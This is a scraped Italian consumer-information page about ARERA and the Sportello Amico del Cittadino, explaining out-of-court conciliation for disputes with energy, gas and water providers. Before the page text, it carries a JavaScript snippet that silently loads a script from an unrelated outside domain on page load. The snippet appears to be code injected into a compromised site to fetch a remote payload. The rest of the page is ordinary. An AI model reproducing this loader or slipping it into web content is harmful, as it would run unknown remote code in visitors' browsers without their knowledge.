;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Arera e Tutela al Consumatore - Sportello Amico del Cittadino
Arera tutela Gas e Luce con Sportello Amico del Cittadino
Arera tutela Gas e Luce con Sportello Amico del Cittadino

ARERA

Arera e Sportello Amico del Cittadino mettono a disposizione ai clienti finali e agli utenti finali e loro delegati una procedura semplice e veloce di risoluzione delle controversie con i propri operatori di energia e gas e con il proprio gestore del servizio idrico prevedendo l’intervento di un conciliatore esperto che supporta le parti a trovare un accordo senza ricorrere alle vie giudiziarie.

Il servizio Conciliazione è uno strumento di tutela stragiudiziale: universale, poiché attivabile presso i nostri uffici previo reclamo nei confronti di tutti gli operatori (sia venditori che i distributori) di energia e gas e di tutti i gestori del servizio idrico integrato ad interazione plurima (scritta e visiva) tra cliente/utente finale e l’operatore /gestore che si incontrano in stanze virtuali (eccezionalmente gli incontri possono svolgersi mediante call conference, che comunque non può essere considerata come modalità esclusiva di svolgimento della procedura) gestito da un conciliatore terzo rispetto le parti, fornito dal servizio Conciliazioni e dotato di specifica formazione in tema di mediazione e di regolarizzazione di settore, che aiuta le parti a raggiungere un accordo in posizione di totale terzietà, e che le guida ad un uso corretto del servizio, per i settori elettrico e gas l’espletamento della procedura di conciliazione è condizione necessaria per potersi rivolgere alla Giustizia ordinaria, qualora le parti non abbiano trovato un accordo alla sua chiusura.

Gli operatori dei settori energetici sono tenuti a partecipare agli incontri di conciliazione.

Per gli utenti del settore idrico il tentativo di conciliazione è volontario, pertanto, non rappresenta, ad oggi, una tappa necessaria per agire in giudizio, i gestori inseriti nell’elenco pubblicato sul sito dell’autorità sono obbligati a partecipare alla procedura attiva dall’utente.

Con Arera il verbale originale sottoscritto in sede di conciliazione con firma digitale in possesso delle parti o con firma elettronica qualificata rilasciata gratuitamente da servizio è presente all’interno del fascicolo on line

Dona il tuo 5x1000 ad Salesiani per il sociale
Scrivimi
Come posso aiutarti?
Buongiorno! 👋
i nostri uffici sono a vostra disposizione, chatta con noi !